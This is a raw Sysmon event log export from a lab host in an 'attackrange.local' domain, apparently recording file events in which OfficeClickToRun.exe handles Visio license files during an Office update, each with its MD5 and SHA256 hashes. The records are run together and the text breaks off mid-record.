14:55:14.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdR_Retail-ul-oob.xrm-msMD5=9193C5F6596400F8D0C47E95F225E745,SHA256=9BB010ACAA5E35B85C05046B6F0DF1E3922D932D54F814540F159163B30BDFF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068046Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdR_Retail-ppd.xrm-msMD5=FF8DD6F85D9D5B764B0560173F463AA7,SHA256=032D5728DBF230B1BEFF0BA495C71C527BBD8E70DD6ECD0FF72972DB5901F3A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068045Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdR_Retail-pl.xrm-msMD5=D3188D2B89570644E0393155782CD81E,SHA256=0B4D311DE31F6F605E695FA56F02EC707A824A8307836AA67AD2F70BA3530683,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068044Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdR_OEM_Perp-ul-phn.xrm-msMD5=2FA9D07D1A14E32301A0DE93FE8D44A7,SHA256=456936C2F0DF420B3F42F507BA331B1BB44FCBB8DA8651364DEE2A3150F52487,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068043Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdR_OEM_Perp-ul-oob.xrm-msMD5=60A70E724998D0530BD2D08ADDF80344,SHA256=7D2FE359FC08C7A8BBB2DE8DCE9CDA6BFCCEC4192D5F7241822128B7CB3A5EE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068042Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdR_OEM_Perp-ppd.xrm-msMD5=0B5D535AD272AD9A3478BB5E2D593356,SHA256=4551656A7B3374909EEA4CB1839834BEEDC6E5E647278C861E14B8BC9F27C6E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068041Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdR_OEM_Perp-pl.xrm-msMD5=389A1A5A128D499D688B8A40330CF0E4,SHA256=765B103B46495271BF5D375FAEB22A7660B0C4B48E056056CF11CB5A34A8DC0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068040Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdR_Grace-ul-oob.xrm-msMD5=3CABF1C497E416B5DB265996317C68BE,SHA256=71712F3CCCF196A6A374A46EC35FCAAFFBB116BBDB126F36F516019A53554C22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068039Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdR_Grace-ppd.xrm-msMD5=63D345771788FCC9E1EA55C9AB582312,SHA256=7DC991B2CB1BCF0D29F7C38B3987916067CB13405F685D601C195D011E92791F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068038Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdO365R_SubTrial-ul-oob.xrm-msMD5=E00AD9D7519BDA2046E9AF124B032A76,SHA256=8FC194FC8015E6CDB1A895BBAE233F7F5379FA37B7E4674C0F67AABC42124D00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068037Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdO365R_SubTrial-ppd.xrm-msMD5=13AD37DF8AAA2E7FCE84C28B8B16D095,SHA256=5BA3953183A8A41D7CC35C844072206BFEF9D04394E4665FC6D79A71C90FDB14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068036Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdO365R_SubTrial-pl.xrm-msMD5=991A395F02E54B88C55A5B79A71B007F,SHA256=6847A995CFA275361D549F2B60C56FC8CDA26F48D16470EECF699C63155FD78B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068035Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdO365R_SubTest-ul-oob.xrm-msMD5=26BFB8E7B73AF24CA1CBD49510070594,SHA256=658A15F0639D1B77BD38114D1A67282912058A386FB1DBBE3452D66D4DC7D68F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068034Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdO365R_SubTest-ppd.xrm-msMD5=B0EEB0B962E39634CACD2FDC07B8431C,SHA256=C1ACF9954872917C74ED12336F85DFC1D4BD5343042127B4B45C4FF74862917E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068033Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdO365R_SubTest-pl.xrm-msMD5=B53387BD890EE0FBFAA4E94BB0D61E58,SHA256=027ED5C1E44D26EE98989AA735D0FF2A32CB9480424EB1AA38FAEF8E7689A143,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068032Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdO365R_Subscription-ul-oob.xrm-msMD5=8D216EC873A4B6EBA2B37093B6AA4B65,SHA256=706546DEC76373706BE5A3E34E9D5F5B1F0FB25736D098A4116CB39763DE3023,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068031Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdO365R_Subscription-ppd.xrm-msMD5=2A2126466730857E18E7744F80FC956C,SHA256=CCBDEA4E23D15674E6881E3D39D38F149DC02E7274DE80AB5ED1F237E4F9FA9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068030Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdO365R_Subscription-pl.xrm-msMD5=23438582E79B5C87AC2EAC12611D2793,SHA256=18FC57EE57167C5E3B7984826500F4B8FF5EFB4F923AF31024E77DEB2DA43E3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068029Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdCO365R_SubTrial-ul-oob.xrm-msMD5=7A214706C1C530AC3130E5F4D85A588F,SHA256=31FA9566442BEDA35CD2C6A12B6869525D633620DBBA102275C682F7B817841B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068028Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdCO365R_SubTrial-ppd.xrm-msMD5=1B59D65AAB0E43126E8FCA26F8B16EB1,SHA256=CC1ACB8C7F183F64FF830008B8FA8388314915468F1826CE9ABD1B3A6A951E9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068027Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdCO365R_SubTrial-pl.xrm-msMD5=B23536EE716D4800C762C3DBA000792C,SHA256=08CFA8CD0F17A78092BC4B49768221305A35F9E603DBB95C7465E2E02892B11A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068026Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdCO365R_SubTest-ul-oob.xrm-msMD5=FB73B1F995E4D075F23C1AD68297BC0C,SHA256=3A670FEA0E80D513859353EB14EA035B35B860092E2F4BCC1EE5C032B64E8E3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068025Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdCO365R_SubTest-ppd.xrm-msMD5=99F5DE376C3C9B25A343A7E53520D903,SHA256=2A226CEFC029E1DAB15C5792ED9F1B3BDBFD24101B7366FAB3532A009EF9DC46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068024Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdCO365R_SubTest-pl.xrm-msMD5=6FF737B037ABBB0BBE24E4AF9DB5ECDB,SHA256=D3DC7D1941970E2699F7C1AD0F8D301C0E308DAF83853CAC6CAB23ED87160542,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068023Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdCO365R_Subscription-ul-oob.xrm-msMD5=0A8D262F222E8639A2DFBB2DD0C5D813,SHA256=08DC1BB3CDFF6AE5B04953BE9FF68E566996E7FDB36C52BCB0947636CA1393F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068022Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdCO365R_Subscription-ppd.xrm-msMD5=C82489D084A330875C0CDA377FA48537,SHA256=5B94BF43AC2EA6CBC77325E6A5E5B1DA278F7F6C469FC3CACEACF12579EC78FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068021Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStdCO365R_Subscription-pl.xrm-msMD5=2403F1FFDF20A3CF836D54D543A5DC8A,SHA256=B0521310358C7CFE9BE85CFEA4ACBB625EB36EE24746EBDF064D0ED296362324,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068020Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStd2019VL_MAK_AE-ul-phn.xrm-msMD5=CE5876D50754EE1090227E8D8C704723,SHA256=FFCB0ABE98FF7F5F2249772A532A7BB960BAC548966AA5DBFFB191A8454C99F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068019Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStd2019VL_MAK_AE-ul-oob.xrm-msMD5=24C43F84D87B455F5DFBDC361998FA17,SHA256=42DF948FC00140D2DE55747629794EDAB8682411B2F5A0908854C03ED7AFC1BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068018Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStd2019VL_MAK_AE-ppd.xrm-msMD5=1180F5CA40B0203FD13B5706D48F5128,SHA256=70ED0F6661522FCAE8F5DCBDEDDC7271B517C6708EA52DB015B02671C9E6B985,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068017Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStd2019VL_MAK_AE-pl.xrm-msMD5=5B9B9F9DA73CD79DF79AE21C19ADC77C,SHA256=A8FD63CC3020FC369ED9FC7C3AFCFA16F4051882EEDAEE8B0BB1910D35577E36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068016Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStd2019VL_KMS_Client_AE-ul.xrm-msMD5=1B2C0FCC90280F7E5835B90BD0A4A9AE,SHA256=5FAE9AB43F796BBCEF53C64705EA8BDFADD1C50EED33B16D1EB1A68D717E5EA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068015Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStd2019VL_KMS_Client_AE-ul-oob.xrm-msMD5=38036FA2899C00DB3175F4F4504F817A,SHA256=9F712B33E24121B762550674F45A04BC8403DCC672CACF4F02D38862EDAF8D68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068014Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStd2019VL_KMS_Client_AE-ppd.xrm-msMD5=9CD833F65AEEA9997719E208C26E91DB,SHA256=4524B5D4E14E187420323A96D925737A5BB93132A7DAC88A78DBAEAE687705D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068013Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStd2019R_Retail-ul-phn.xrm-msMD5=212BC25BAE0F392372B3CE8A66D42437,SHA256=07F86AB672DD01B296A7551AEA30C3228960BACCBD4E4E0435ED6C5756287E83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068012Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStd2019R_Retail-ul-oob.xrm-msMD5=8537E25680F12819AD883B8F6C5D834A,SHA256=9C4B1555385ACAEE64323D355FE8F10C690BBA717D55C8C56B410D03220C0362,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068011Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStd2019R_Retail-ppd.xrm-msMD5=EE921DE5AE3DB3F750FF1F7D4C766E3B,SHA256=36B67FBDD01DB18669F23846FD5EE697553385D288E4049DF1FCD47E77042CA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068010Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStd2019R_Retail-pl.xrm-msMD5=8BA9B832513B8A4081B669ED580740CA,SHA256=C5605ECE56913CEEE0C44E388F2CF59CAEB31A4E15855FE1291A623FC5EDC0CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068009Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStd2019R_OEM_Perp-ul-phn.xrm-msMD5=75738EB84ED2A2CED5640C26E74B77C3,SHA256=8C0A8B9ECA1B633D9CB6092EABCB1D12029EBA759D2E67EB1EE143247DCE2B7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068008Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStd2019R_OEM_Perp-ul-oob.xrm-msMD5=86FAD418ABD2563670E89BF3F530E02D,SHA256=FD76EE0ABBE94CD1401ED7E40492E2599B8D2DAD0471266AC3952B4F39A8E9CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068007Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStd2019R_OEM_Perp-ppd.xrm-msMD5=6B2E8207C8EC83A49CA2D30FD9D63E65,SHA256=DD02D89151DDC2549FAE263FD4F1C43723086EC43EE776467A63C4CAE31CCBEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068006Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStd2019R_OEM_Perp-pl.xrm-msMD5=FCD1748B5C7851F5BCC573226517EC5F,SHA256=F2278B99CD764299AA9C8035AE5C200750DCB6C5A8497017C1C99A740E69746F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068005Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStd2019R_Grace-ul-oob.xrm-msMD5=2D3E6C16D3F16FB01A89C0E009D447AD,SHA256=000BF7E256AFC452A8A8C05555179A960E5AA1478973BA2832B05B77843D12BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068004Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 